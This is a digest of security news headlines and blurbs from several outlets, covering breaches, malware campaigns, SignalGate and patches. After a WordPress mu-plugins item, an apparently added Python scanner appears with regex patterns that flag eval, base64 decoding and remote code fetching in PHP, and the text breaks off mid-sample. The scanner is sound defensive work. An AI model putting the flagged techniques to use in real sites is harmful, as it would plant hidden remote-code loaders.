Today's Core Dump is brought to you by ThreatPerspective

Biz & IT - Ars Technica

What could possibly go wrong? DOGE to rapidly rebuild Social Security codebase.

A safe and proper rewrite should take years, not months. The so-called Department of Government Efficiency (DOGE) is starting to put together a team to migrate the Social Security Administration’s (SSA) computer

Published: 2025-03-29T14:08:49



Biz & IT - Ars Technica

Oracle has reportedly suffered 2 separate breaches exposing thousands of customers’ PII

Alleged breaches affect Oracle Cloud and Oracle Health. Oracle isn’t commenting on recent reports that it has experienced two separate data breaches that have exposed sensitive personal information belonging to

Published: 2025-03-28T19:41:14



Biz & IT - Ars Technica

Gemini hackers can deliver more potent attacks with a helping hand from Gemini

Hacking LLMs has always been more art than science. A new attack on Gemini could change that. In the growing canon of AI security, the indirect prompt injection has emerged as the most powerful means for attacke

Published: 2025-03-28T11:00:58



The Register - Software

Malware in Lisp? Now you're just being cruel

Miscreants warming to Delphi, Haskell, and the like to evade detection

Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.

Published: 2025-03-29T10:50:05



The Register - Software

Windows Server 2025 locking up after February patch, no word of when a fix will land

Similar issue in Windows 11 resolved as of Wednesday

Microsoft is warning that a faulty patch pushed out in February is causing Windows Server 2025 Remote Desktop sessions to freeze under certain circumstances.

Published: 2025-03-28T11:37:06



The Register - Software

US defense contractor cops to sloppy security, settles after infosec lead blows whistle

MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade

A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims

Published: 2025-03-26T20:07:11



The Register - Software

Microsoft patches patch that broke USB printing in Windows 11

Now the only nonsense printed out will come from the user

Months after releasing a patch that left some printers spouting gibberish, Microsoft is issuing another update to deal with it.

Published: 2025-03-26T14:45:13



Security - The Verge

Trump advisor reportedly used personal Gmail for ‘sensitive’ military discussions

Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed sensitive military positions and powerful weapons systems relating to an ongoing conflict, using his personal Gmail account. Waltz, along with other members of […]

Published: 2025-04-01T18:59:13



Security - The Verge

Gmail is making it easier for businesses to send encrypted emails to anyone

Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it’s developed a new encryption model that, unlike the current encryption feature on Gmail, doesn’t require senders or recipients to use custom software or exchange encryption certificates. The feature is rolling out in […]

Published: 2025-04-01T09:00:00



Security - The Verge

Madison Square Garden’s surveillance system banned this fan over his T-shirt design

A concert on Monday night at New York’s Radio City Music Hall was a special occasion for Frank Miller: his parents’ wedding anniversary. He didn’t end up seeing the show, and before he could even get past security, he was informed that he was in fac

Published: 2025-03-28T13:10:41



Security - The Verge

Vivaldi bundles Proton VPN into its web browser

Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi's browser, and can be accessed by logging into a Vivaldi account. The feature is currently […]

Published: 2025-03-27T06:44:51



Security - The Verge

The Atlantic releases strike group chat messages

On March 24th, The Atlantic's editor-in-chief Jeffrey Goldberg published a damning story about being added to the Houthi PC Small Group on Signal by Trump's national security adviser Mike Waltz. In it, he described inadvertently becoming privy to h

Published: 2025-03-26T10:58:12



Security - The Verge

Trump officials planned a military strike over Signal with a magazine editor on the line

Getting added to the wrong group chat is a common problem, but what if that group chat is describing an upcoming military strike? That's what happened to The Atlantic editor-in-chief Jeffrey Goldberg, who was added to a Signal group chat formed by hi

Published: 2025-03-24T17:45:00



Security - The Verge

Alleged Snowflake hacker agrees to be extradited to the US

Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake's cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snowflake breaches, including AT&T and Ticketmaster. Alexander Connor Moucka, who was arrested in Canada on October 30th […]

Published: 2025-03-24T17:39:05



Security - The Verge

Google sues alleged scammers over 10,000 fake Maps listings

Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company's lawsuit alleges that a man connected to a broader scam network created fake business profiles on Google Maps and sold them for profit. Google was tipped off by a […]

Published: 2025-03-20T17:32:57



Security - The Verge

How the EU's DMA is changing Big Tech: all of the news and updates

The European Union’s Digital Markets Act (DMA) has come into force, and it’s meant that some of the world’s biggest tech companies are having to make major changes to how they operate. The law, which is designed to increase competition in the EU’s digital markets, designates some large online companies and their services as “gatekeepers.” […]

Published: 2025-03-19T12:15:59



Security - The Verge

Why Google made a $32 billion bet on Wiz

Google’s latest acquisition is its most expensive yet — and perhaps its riskiest, too. On Tuesday, the search giant announced that it acquired the cloud security startup Wiz for $32 billion. It’s a major bet that Wiz can help beef up Google’s cloud business, which makes far less money than the offerings built by its […]

Published: 2025-03-19T09:00:00



BleepingComputer

We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain

A RAR file, a fake summons, and a Nietzsche quote are all part of a multi-stage malware chain delivering DCRat & Rhadamanthys. Acronis TRU breaks down how attackers use VBS, batch, and PowerShell scripts to slip past defenses. [...]

Published: 2025-04-01T13:30:00



BleepingComputer

Apple backports zero-day patches to older iPhones and Macs

Apple has released security updates that backport fixes for vulnerabilities exploited as zero-days to older versions of its operating systems. [...]

Published: 2025-04-01T09:35:33



BleepingComputer

Critical auth bypass bug in CrushFTP now exploited in attacks

Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code. [...]

Published: 2025-04-01T08:46:21



BleepingComputer

Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks

A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). [...]

Published: 2025-03-31T14:49:00



BleepingComputer

Hackers abuse WordPress MU-Plugins to hide malicious code

Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]

Published: 2025-03-31T13:06:04



Technology

US to deploy world's first sixth-gen fighter by end of decade

The US Air Force has announced that it will go ahead with the production of the F-47 Next Generation Air Dominance (NGAD) fighter. Expected to enter service by the end of the decade, it will replace the F-22 Raptor as America's air supremacy fighter....

Published: 2025-03-24T00:21:08



Krebs on Security

When Getting Phished Puts You in Mortal Danger

Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you ...

Published: 2025-03-27T16:39:49



Krebs on Security

Arrests in Tap-to-Pay Scheme Powered by Phishing

Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets b...

Published: 2025-03-21T19:12:04



The Register - Security

Microsoft to mark five decades of Ctrl-Alt-Deleting the competition

Copilot told us that half a century is 25 years. It feels much longer

Microsoft will officially hit the half-century mark on Friday as the Windows giant turns 50 years old. What do you consider the highs and lows of the company's journey to dominance?

Published: 2025-04-01T15:32:08



The Register - Security

Google makes end-to-end encrypted Gmail easy for all, even Outlook users

The UK government must be thrilled

Google will soon offer end-to-end encrypted (E2EE) email for all users, even those who do not use Google Workspace, and says it'll do so without imposing any undue stress on IT admins.

Published: 2025-04-01T13:00:13



The Register - Security

UK threatens £100K-a-day fines under new cyber bill

Tech secretary reveals landmark legislation's full details for first time

The UK's technology secretary revealed the full breadth of the government's Cyber Security and Resilience (CSR) Bill for the first time this morning, pledging £100,000 ($129,000) daily fines for failing to act against specific threats under consideration.

Published: 2025-04-01T11:37:23



The Register - Security

GCHQ intern took top secret spy tool home, now faces prison

Not exactly Snowden levels of skill

A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.

Published: 2025-04-01T08:51:54



The Register - Security

CISA spots spawn of Spawn malware targeting Ivanti flaw

Resurge, an apt name for malware targeting a hardware maker that has security bug after security bug

Owners of Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products have a new strain of malware to fend off, according to the US Cybersecurity and Infrastructure Security Agency, aka CISA.

Published: 2025-04-01T01:09:08



The Register - Security

Top cybersecurity boffin, wife vanish as FBI raids homes

Indiana Uni rm -rf online profiles while agents haul boxes of evidence

A tenured computer security professor at Indiana University and his university-employed wife have not been seen publicly since federal agents raided their homes late last week.

Published: 2025-03-31T23:16:39



The Register - Security

Oracle Cloud security SNAFU latest: IT giant accused of pedantry as evidence scrubbed

1990s incident response in 2025

Two Oracle data security breaches have been reported in the past week, and the database goliath not only remains reluctant to acknowledge the disasters publicly; it may be scrubbing the web of evidence, too.

Published: 2025-03-31T21:30:00



The Register - Security

Check Point confirms breach, but says it was 'old' data and crook made 'false' claims

Explanation leaves a 'lot of questions unanswered,' says infosec researcher

A digital burglar is claiming to have nabbed a trove of "highly sensitive" data from Check Point - something the American-Israeli security biz claims is a huge exaggeration.

Published: 2025-03-31T16:35:09



The Register - Security

Cloud security explained: What's left exposed?

Think AWS has security covered? Think again. Discover real-world examples of what it doesn't secure and how to protect your environment

Advertorial AWS customers might assume that security is taken care of for them - however, this is a dangerous misconception.

Published: 2025-03-31T10:00:09



The Register - Security

China cracks down on personal information collection. No, seriously

PLUS: Indonesia crimps social media, allows iPhones; India claims rocket boost; In-flight GenAI for Japan Airlines

Asia In Brief China last week commenced a crackdown on inappropriate collection and subsequent use of personal information.

Published: 2025-03-31T00:30:14



The Register - Security

Oracle Health reportedly warns of info leak from legacy server

PLUS: OpenAI bumps bug bounties bigtime; INTERPOL arrests 300 alleged cyber-scammers; And more!

Infosec in brief Oracle Health appears to have fallen victim to an info stealing attack that has led to patient data stored by American hospitals being plundered.

Published: 2025-03-30T22:45:12



The Register - Security

Malware in Lisp? Now you're just being cruel

Miscreants warming to Delphi, Haskell, and the like to evade detection

Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.

Published: 2025-03-29T10:50:05



The Register - Security

Cardiff's children's chief confirms data leak 2 months after cyber risk was 'escalated'

Department director admits Welsh capital's council still trying to get heads around threat of dark web leaks

Cardiff City Council's director of children's services says data was leaked or stolen from the organization, although she did not clarify how or what was pilfered.

Published: 2025-03-28T12:28:14



The Register - Security

After Chrome patches zero-day used to target Russians, Firefox splats similar bug

Single click on a phishing link in Google browser blew up sandbox on Windows

Google pushed out an emergency patch for Chrome on Windows this week to stop attackers exploiting a sandbox-breaking zero-day vulnerability, seemingly used by snoops to target certain folks in Russia.

Published: 2025-03-28T06:34:11



The Register - Security

Cyber-crew claims it cracked American cableco, releases terrible music video to prove it

WOW! DID! SOMEONE! REALLY! STEAL! DATA! ON! 400K! USERS?!

A cyber-crime ring calling itself Arkana has made a cringe music video to boast of an alleged theft of subscriber account data from Colorado-based cableco WideOpenWest (literally, WOW!)

Published: 2025-03-28T01:17:11



The Register - Security

China's FamousSparrow flies back into action, breaches US org after years off the radar

Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET

The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.

Published: 2025-03-27T22:06:58



The Register - Security

Security shop pwns ransomware gang, passes insider info to authorities

Researchers say 'proactive' approach is needed to combat global cybercrime

Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.

Published: 2025-03-27T16:32:09



The Register - Security

CrushFTP CEO's feisty response to VulnCheck's CVE for critical make-me-admin bug

Screenshot shows company head unhappy, claiming 'real CVE is pending'

CrushFTP's CEO is not happy with VulnCheck after the CVE numbering authority (CNA) released an unofficial ID for the critical vulnerability in its file transfer tech disclosed almost a week ago.

Published: 2025-03-27T13:20:10



The Register - Security

UK's first permanent facial recognition cameras installed in South London

As if living in Croydon wasn't bad enough

The Metropolitan Police has confirmed its first permanent installation of live facial recognition (LFR) cameras is coming this summer and the lucky location will be the South London suburb of Croydon.

Published: 2025-03-27T10:27:31



The Register - Security

Ransomwared NHS software supplier nabs £3M discount from ICO for good behavior

Data stolen included checklist for medics on how to get into vulnerable people's homes

The UK's data protection watchdog is dishing out a £3.07 million ($3.95 million) fine to Advanced Computer Software Group, whose subsidiary's security failings led to a ransomware attack affecting NHS care.

Published: 2025-03-27T09:30:06



The Register - Security

Signalgate storm intensifies as journalist releases full secret Houthi airstrike chat

So F-18 launch times, weapons, drone support aren't classified now ... who knew?

Updated The Atlantic's editor-in-chief who was inadvertently added to a Signal group in which the US Secretary of Defense, Vice President, and others discussed secret military plans has now publicly released the messages.

Published: 2025-03-26T21:16:32



The Register - Security

US defense contractor cops to sloppy security, settles after infosec lead blows whistle

MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade

A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims for payment.

Published: 2025-03-26T20:07:11



The Register - Security

Files stolen from NSW court system, including restraining orders for violence

Victims' details at risk after criminals download 9,000 files from court database

Australian police are currently investigating the theft of "sensitive" data from a New South Wales court system after they confirmed approximately 9,000 files were stolen.

Published: 2025-03-26T17:29:05



The Register - Security

Credible nerd says stop using atop, doesn't say why, everyone panics

Bad news about the Linux system monitor may be on the way

Updated Veteran sysadmin and tech blogger Rachel Kroll posted a cryptic warning yesterday about a popular Linux system monitoring tool. Maybe it's better to be safe than sorry.

Published: 2025-03-26T15:31:09



The Register - Security

NCSC taps influencers to make 2FA go viral

Who knew social media stars had a role to play in building national cyber resilience?

The world's biggest brands have benefited from influencer marketing for years; now the UK's National Cyber Security Centre (NCSC) has hopped on the bandwagon to preach two-factor authentication (2FA) to the masses.

Published: 2025-03-26T11:00:13



The Register - Security

There are 10,000 reasons to doubt Oracle Cloud's security breach denial

Customers come forward claiming info was swiped from prod

Oracle Cloud's denial of a digital break-in is now in clear dispute. An infosec researcher working on validating claims that the cloud provider's login servers were compromised earlier this year says some customers have confirmed data allegedly stolen and leaked from the database giant is genuine.

Published: 2025-03-25T17:35:42



The Register - Security

Infosec pro Troy Hunt HasBeenPwned in Mailchimp phish

16,000 stolen records pertain to former and active mail subscribers

Infosec veteran Troy Hunt of HaveIBeenPwned fame is notifying thousands of people after phishers scooped up his Mailchimp mailing list.

Published: 2025-03-25T12:28:08



The Register - Security

You know that generative AI browser assistant extension is probably beaming everything to the cloud, right?

Just an FYI, like

Generative AI assistants packaged up as browser extensions harvest personal data with minimal safeguards, researchers warn.

Published: 2025-03-25T08:31:12



The Register - Security

VanHelsing ransomware emerges to put a stake through your Windows heart

There's only one rule: don't attack Russia, duh

Check Point has spotted a fresh ransomware-as-a-service crew in town: VanHelsing, touting a cross-platform locker targeting Microsoft Windows, Linux, and VMware ESXi systems, among others. But so far, only Windows machines have fallen victim, we're told.

Published: 2025-03-25T07:32:07



The Register - Security

Hm, why are so many DrayTek routers stuck in a bootloop?

Time to update your firmware, if you can, to one with the security fixes, cough cough

DrayTek router owners in the UK and beyond had a pretty miserable weekend after some ISPs began to notice a bunch of their customers' gateways going offline.

Published: 2025-03-25T06:37:06



The Register - Security

Public-facing Kubernetes clusters at risk of takeover thanks to Ingress-Nginx flaw

How many K8s systems are sat on the internet front porch like that ... Oh, thousands, apparently

Cloudy infosec outfit Wiz has discovered serious vulnerabilities in the admission controller component of Ingress-Nginx Controller that could allow the total takeover of Kubernetes clusters and thinks more than 6,000 deployments of the software are at risk on the internet.

Published: 2025-03-25T03:12:10



The Register - Security

OTF, which backs Tor, Let's Encrypt and more, sues to save its funding from Trump cuts

Kari, are you OK, are you OK, Kari?

Updated An organization that bankrolls various internet security projects has asked a Washington DC court to prevent the Trump administration from cancelling its federal funding and expressed fears that if the cash stops flowing, the tools it supports could become harder to access.

Published: 2025-03-25T00:46:04



The Register - Security

Top Trump officials text secret Yemen airstrike plans to journo in Signal SNAFU

Massive OPSEC fail from the side who brought you 'lock her up'

Updated Senior Trump administration officials used the messaging app Signal to discuss detailed plans to attack Houthi rebels in Yemen and accidentally added a journalist to the group in which they chatted.

Published: 2025-03-24T23:02:47



The Register - Security

FCC on the prowl for Huawei and other blocked Chinese makers in America

Be vewy vewy quiet, I'm hunting rackets

The FCC is investigating whether Chinese manufacturers black-listed on its so-called Covered List - including Huawei - are still somehow doing business in America, either by misreading the rules or willfully ignoring them.

Published: 2025-03-24T21:24:43



The Register - Security

As nation-state hacking becomes 'more in your face,' are supply chains secure?

Ex-US Air Force officer says companies shouldn't wait for govt mandates

Interview Former US Air Force cyber officer Sarah Cleveland worries about the threat of a major supply-chain attack from China or another adversarial nation. So she installed solar panels on her house: "Because what if the electric grid goes down?"

Published: 2025-03-24T20:32:11



The Register - Security

AI agents swarm Microsoft Security Copilot

Looking to sort through large volumes of security info? Redmond has your backend

Microsoft's Security Copilot is getting some degree of agency, allowing the underlying AI model to interact more broadly with the company's security software to automate various tasks.

Published: 2025-03-24T16:00:09



The Register - Security

23andMe's genes not strong enough to avoid Chapter 11

CEO steps down after multiple failed attempts to take the DNA testing company private

Beleaguered DNA testing biz 23andMe, hit by a massive cyber attack in 2023, is filing for bankruptcy protection in the US following years of financial uncertainty.

Published: 2025-03-24T14:01:09



The Register - Security

Is Washington losing its grip on crypto, or is it a calculated pivot to digital dominance?

It's been a very busy week for Digicash Donald's administration

Analysis Is the US retreating from its hardline stance on crypto? On Friday, the US Treasury Department lifted sanctions imposed on notorious crypto mixer Tornado Cash, once accused of washing billions in illicit crypto for criminals and nation-states alike.

Published: 2025-03-24T11:45:14



The Register - Security

Microsoft tastes the unexpected consequences of tariffs on time

Throw a spanner in the works, best get good at fixing things. Now, where did you put that spanner?

Opinion Never attribute to malice that which is adequately explained by stupidity. This works well in sane times, less so when "but it's both" is the default. Apply it to Microsoft's decision to make bug reports include not only a working example but a video of the same, and the meter oscillates wildly. What were they thinking? What did they expect?

Published: 2025-03-24T09:30:12



The Register - Security

Mobsters now overlap with cybercrime gangs and use AI for evil, Europol warns

PLUS: Russian bug-buyer seeks Telegram flaws; Another WordPress security mess; NIST backlog grows; and more!

Infosec In Brief Organized crime networks are now reliant on digital tech for most of their activities, according to Europol, the European agency that fights international crime on the continent and beyond.

Published: 2025-03-24T05:29:13



The Register - Security

China bans compulsory facial recognition and its use in private spaces like hotel rooms

PLUS: Zoho's Ulaa anointed India's most patriotic browser; Typhoon-like gang targets Taiwan; Japan debates offensive cyber-ops; and more

Asia In Brief China's Cyberspace Administration and Ministry of Public Security have outlawed the use of facial recognition without consent.

Published: 2025-03-23T23:29:34



The Register - Security

Oracle Cloud says it's not true someone broke into its login servers and stole data

Despite evidence to the contrary as alleged pilfered info goes on sale

Oracle has straight up denied claims by a miscreant that its public cloud offering has been compromised and information stolen.

Published: 2025-03-23T21:09:14



The Register - Security

Ex-NSA boss: Election security focus helped dissuade increase in Russian meddling with US

Plus AI in the infosec world, why CISA should know its place, and more

Interview Russia appears to be having second thoughts on how aggressively, or at least how visibly, it attempts to influence American elections, according to a former head of the NSA.

Published: 2025-03-23T13:04:07



The Register - Security

AdTech CEO whose products detected fraud jailed for financial fraud

Made up revenue and pretended to use non-existent data

The former CEO of Kubient, an advertising tech company that developed a cloudy product capable of detecting fraudulent ads, has been jailed for fraud.

Published: 2025-03-21T07:32:07



The Register - Security

Paragon spyware deployed against journalists and activists, Citizen Lab claims

Plus: Customer info stolen from 'parental control' software slinger SpyX; F-35 kill switch denied

Infosec newsbytes Israeli spyware maker Paragon Solutions pitches its tools as helping governments and law enforcement agencies to catch criminals and terrorists, but a fresh Citizen Lab report claims its software has been used to target journalists, activists, and other civilians.

Published: 2025-03-21T06:26:06



The Register - Security

Capital One cracker could be sent back to prison after judges rule she got off too lightly

Feds want book thrown at Paige Thompson, who pinched 100M customer records

Paige Thompson, the perpetrator of the Capital One data theft, may be sent back behind bars after an appeals court ruled her sentence of time served plus five years of probation was too lenient.

Published: 2025-03-21T01:06:58



The Register - Security

Dept of Defense engineer took home top-secret docs, booked a fishing trip to Mexico then the FBI showed up

So much for that vacation

A US Department of Defense electrical engineer has turned his world upside down after printing 155 pages from 20 documents, all of which were marked top secret and classified, from his DoD workspace, brought them home with him and was collared on his way to Mexico.

Published: 2025-03-20T23:02:20



The Register - Security

Infoseccers criticize Veeam over critical RCE vulnerability and a failing blacklist

Palming off the blame using an unknown best practice didn't go down well either

In patching the latest critical remote code execution (RCE) bug in Backup and Replication, software shop Veeam is attracting criticism from researchers for the way it handles uncontrolled deserialization vulnerabilities.

Published: 2025-03-20T18:33:14



The Register - Security

Too many software supply chain defense bibles? Boffins distill advice

How to avoid another SolarWinds, Log4j, and XZ Utils situation

Organizations concerned about software supply chain attacks should focus on role-based access control, system monitoring, and boundary protection, according to a new preprint paper on the topic.

Published: 2025-03-20T13:31:13



The Register - Security

The post-quantum cryptography apocalypse will be televised in 10 years, says UK's NCSC

Wow, a government project that could be on time for once ... cos it's gonna be wayyyy more than a decade

The UK's National Cyber Security Centre (NCSC) today started the post-quantum cryptography (PQC) countdown clock by claiming organizations have ten years to migrate to a safer future.

Published: 2025-03-20T13:15:05



Security Latest

Cybersecurity Professor Mysteriously Disappears as FBI Raids His Homes

Xiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school's website were wiped ahead of recent FBI raids.

Published: 2025-03-31T19:42:00



Security Latest

An AI Image Generator’s Exposed Database Reveals What People Really Used It For

An unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images some of which are likely illegal. The company deleted its websites after WIRED reached out.

Published: 2025-03-31T10:00:00



Security Latest

Top Trump Officials’ Passwords and Personal Phone Numbers Discovered Online

Plus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.

Published: 2025-03-29T10:30:00



Security Latest

Even More Venmo Accounts Tied to Trump Officials in Signal Group Chat Left Data Public

WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.

Published: 2025-03-27T21:47:31



Security Latest

SignalGate Is Driving the Most US Downloads of Signal Ever

Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption, its “largest US growth moment by a massive margin.”

Published: 2025-03-27T18:31:30



Security Latest

Mike Waltz Left His Venmo Friends List Public

A WIRED review shows national security adviser Mike Waltz, White House chief of staff Susie Wiles, and other top officials left sensitive information exposed via Venmo until WIRED asked about it.

Published: 2025-03-26T20:44:21



Security Latest

SignalGate Isn’t About Signal

The Trump cabinet’s shocking leak of its plans to bomb Yemen raises myriad confidentiality and legal issues. The security of the encrypted messaging app Signal is not one of them.

Published: 2025-03-26T18:54:49



Security Latest

How to Delete Your Data From 23andMe

DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.

Published: 2025-03-24T20:51:59



Security Latest

How to Enter the US With Your Digital Privacy Intact

Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.

Published: 2025-03-24T18:10:05



Security Latest

Using Starlink Wi-Fi in the White House Is a Slippery Slope for US Federal IT

The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.

Published: 2025-03-24T17:24:31



Security Latest

Trump’s Aggression Sours Europe on US Cloud Giants

Companies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.

Published: 2025-03-24T06:00:00



Security Latest

How to Avoid US-Based Digital Services and Why You Might Want To

Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here's what you need to know.

Published: 2025-03-21T10:30:00



Security Latest

Low-Cost Drone Add-Ons From China Let Anyone With a Credit Card Turn Toys Into Weapons of War

Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.

Published: 2025-03-20T09:00:00



The Hacker News

Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as

Published: 2025-04-01T22:38:00



The Hacker News

Enterprise Gmail Users Can Now Send End-to-End Encrypted Emails to Any Platform

On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox

Published: 2025-04-01T21:04:00



The Hacker News

Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing

A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,

Published: 2025-04-01T19:48:00



The Hacker News

Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices

Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate

Published: 2025-04-01T16:58:00



The Hacker News

Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign

Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. "This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation," threat

Published: 2025-04-01T16:47:00



The Hacker News

China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions

Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. "The first sighting of its activity was in the second quarter of 2023; back then, it was

Published: 2025-04-01T16:33:00



The Hacker News

New Case Study: Global Retailer Overshares CSRF Tokens with Facebook

Are your security tokens truly secure? Explore how Reflectiz helped a giant retailer to expose a Facebook pixel that was covertly tracking sensitive CSRF tokens due to human error misconfigurations. Learn about the detection process, response strategies, and steps taken to mitigate this critical issue. Download the full case study here.  By implementing Reflectiz's recommendations, the

Published: 2025-04-01T16:33:00



The Hacker News

Apple Fined €150 Million by French Regulator Over Discriminatory ATT Consent Practices

Apple has been hit with a fine of €150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorité de la concurrence said it's imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,

Published: 2025-04-01T11:17:00



The Hacker News

Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp

The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of

Published: 2025-03-31T22:11:00



The Hacker News

Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images

Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
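Because anything under wp-content/mu-plugins runs on every page load without ever being activated, that directory deserves the same treatment as a cron table: a known-good inventory plus a periodic scan for the usual obfuscation tells. The following is an added example in Python, not Sucuri's or WordPress's own tooling; the indicator list is a constructed heuristic set, and `build_sample_site` writes two constructed PHP files (one benign, one modelled on the kind of loader the campaign drops) into a temporary directory so the scan can run offline.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators of injected PHP (a constructed list for this example, not Sucuri's ruleset).
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I)),
    ("remote_include", re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I)),
    ("remote_fetch", re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I)),
    ("variable_function", re.compile(r"\$\w+\s*\(\s*\$")),   # $f($_GET[...]) style dynamic calls
    ("hides_from_plugin_list", re.compile(r"\ball_plugins\b")),  # filters the admin plugin list
]


def scan_mu_plugins(wp_root):
    """Return {relative_path: [indicators]} for PHP files under wp-content/mu-plugins that match."""
    mu_dir = Path(wp_root) / "wp-content" / "mu-plugins"
    findings = {}
    if not mu_dir.is_dir():
        return findings
    for path in sorted(mu_dir.rglob("*.php")):
        text = path.read_text(errors="replace")
        hits = [name for name, rx in INDICATORS if rx.search(text)]
        # A single enormous line is typical of packed or obfuscated droppers.
        if max((len(line) for line in text.splitlines()), default=0) > 500:
            hits.append("very_long_line")
        if hits:
            findings[path.relative_to(mu_dir).as_posix()] = hits
    return findings


def unexpected_files(wp_root, expected):
    """Files present under mu-plugins that are not on the operator's known-good inventory."""
    mu_dir = Path(wp_root) / "wp-content" / "mu-plugins"
    present = {p.relative_to(mu_dir).as_posix() for p in mu_dir.rglob("*") if p.is_file()}
    return sorted(present - set(expected))


BENIGN_PHP = """<?php
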